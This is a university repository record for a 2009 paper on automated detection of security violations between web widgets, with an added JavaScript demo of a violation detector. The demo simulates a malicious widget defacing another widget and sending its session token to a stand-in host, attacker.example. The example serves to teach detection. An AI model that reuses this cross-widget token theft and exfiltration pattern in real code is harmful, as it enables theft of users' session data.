Automated Security Testing of Web Widget Interactions

Author: Bezemer, C.P.; Mesbah, A.; Van Deursen, A.
Faculty: Electrical Engineering, Mathematics and Computer Science
Department: Software Computer Technology
Date: 2009-12-31

Abstract

This paper is a pre-print of: Cor-Paul Bezemer, Ali Mesbah, and Arie van Deursen. Automated Security Testing of Web Widget Interactions. In Proceedings of the 7th joint meeting of the European Software Engineering Conference and the ACM SIGSOFT Symposium on the Foundations of Software Engineering (ESEC/FSE'09). Research Papers. ACM. 2009.

We present a technique for automatically detecting security vulnerabilities in client-side self-contained components, called web widgets, which can co-exist independently on a single web page. In this paper we focus on two security scenarios, namely the case in which (1) a malicious widget changes the content (DOM) of another widget, and (2) a widget steals data from another widget and sends it to the server via an HTTP request. We propose a dynamic analysis approach for automatically executing the web application and analyzing the runtime changes in the user interface, as well as the outgoing HTTP calls, to detect inter-widget interaction violations. Our approach, implemented in a number of open source Atusa plugins, called Diva, requires no modification of application code and has few false positives. We discuss the results of an empirical evaluation of the violation-revealing capabilities, performance, and scalability of our approach, by means of two case studies, on the Exact Widget Framework and Pageflakes, a commercial, widely used widget framework.
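The two violation scenarios named in the abstract, as an added illustration written for this page (it is not code from Diva, Atusa or the paper): a toy widget/DOM model in JavaScript where each node records the widget that owns it, a monitor that tracks which widget is currently executing, and two checks. Check (1) flags a DOM write whose target node belongs to a different widget than the active one; check (2) flags an outgoing request whose body carries a value taken from another widget's DOM. The widget layout, the `Monitor` class, the active-widget context and the substring test for leaked values are all assumptions of this example; the paper's own analysis works on the DOM states and HTTP traffic observed while Atusa drives the real application, and its attribution of changes to widgets is not reproduced here.

```javascript
'use strict';
// Added example: toy model of inter-widget violation detection.
// Not the Diva implementation; widget/DOM/request structures are assumed.

// Minimal DOM model: each widget owns a subtree; every node carries its owner.
function makeWidget(id, fields) {
  const root = { id: `${id}-root`, owner: id, children: [] };
  for (const [name, text] of Object.entries(fields)) {
    root.children.push({ id: `${id}-${name}`, owner: id, text, children: [] });
  }
  return { id, root };
}

function findNode(widget, nodeId) {
  const stack = [widget.root];
  while (stack.length) {
    const n = stack.pop();
    if (n.id === nodeId) return n;
    stack.push(...n.children);
  }
  return null;
}

function collectTexts(node, out = []) {
  if (node.text) out.push(node.text);
  node.children.forEach(c => collectTexts(c, out));
  return out;
}

// Runtime monitor: records which widget is executing, and checks every DOM
// write and every outgoing request against that context. Application code
// is not modified; only the write/request entry points are observed.
class Monitor {
  constructor(widgets) {
    this.widgets = new Map(widgets.map(w => [w.id, w]));
    this.active = null;      // id of the widget whose code is running
    this.violations = [];    // detected inter-widget interaction violations
  }

  run(widgetId, fn) {
    const prev = this.active;
    this.active = widgetId;
    try { fn(); } finally { this.active = prev; }
  }

  // Scenario (1): a widget writes into a node owned by another widget.
  setText(node, text) {
    if (node.owner !== this.active) {
      this.violations.push({ kind: 'dom-modification', by: this.active,
                             target: node.owner, node: node.id });
    }
    node.text = text;
  }

  // Scenario (2): a request body contains a value from another widget's DOM.
  // The minimum length avoids matching trivial strings; an assumed heuristic.
  sendRequest(url, body) {
    for (const [id, w] of this.widgets) {
      if (id === this.active) continue;
      for (const v of collectTexts(w.root)) {
        if (v.length >= 4 && body.includes(v)) {
          this.violations.push({ kind: 'data-leak', by: this.active,
                                 victim: id, url, value: v });
        }
      }
    }
    return { url, body };
  }
}

// Constructed scenario: a "mail" widget holding a session token and an "evil"
// widget that defaces the mail widget and exfiltrates the token.
function runScenario() {
  const mail = makeWidget('mail', { token: 'sess-8f3a91', subject: 'Quarterly report' });
  const evil = makeWidget('evil', { banner: 'Hi' });
  const mon = new Monitor([mail, evil]);

  // Legitimate: mail updates its own subtree.
  mon.run('mail', () => mon.setText(findNode(mail, 'mail-subject'), 'Updated report'));

  mon.run('evil', () => {
    mon.setText(findNode(evil, 'evil-banner'), 'Hello');                 // own subtree: fine
    mon.setText(findNode(mail, 'mail-subject'), 'You have won!');        // violation (1)
    mon.sendRequest('https://attacker.example/collect',
                    'tok=' + findNode(mail, 'mail-token').text);         // violation (2)
    mon.sendRequest('https://attacker.example/ping', 'ok=1');            // no foreign data: fine
  });
  return mon.violations;
}

console.log(JSON.stringify(runScenario(), null, 2));
```

Running the file reports exactly two violations: the write by `evil` into `mail-subject`, and the request to `/collect` carrying `mail`'s token. The write by `mail` to its own node and the `/ping` request are not reported, which is the false-positive behaviour a practitioner should check first when tuning such a detector.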
Subject: web applications; security testing
To reference this document use: http://resolver.tudelft.nl/uuid:35415c1b-c661-4200-92cc-6f83ccd61808
Publisher: Delft University of Technology, Software Engineering Research Group
ISSN: 1872-5392
Source: Technical Report Series TUD-SERG-2009-011
Other version: https://doi.org/10.1145/1595696.1595711
Part of collection: Institutional Repository
Document type: report
Rights: (c) 2009 by the authors of this report. Software Engineering Research Group, Department of Software Technology, Faculty of Electrical Engineering, Mathematics and Computer Science, Delft University of Technology. All rights reserved. No part of this series may be reproduced in any form or by any means without prior written permission of the authors.
Files: PDF TUD-SERG-2009-011.pdf (317.37 KB)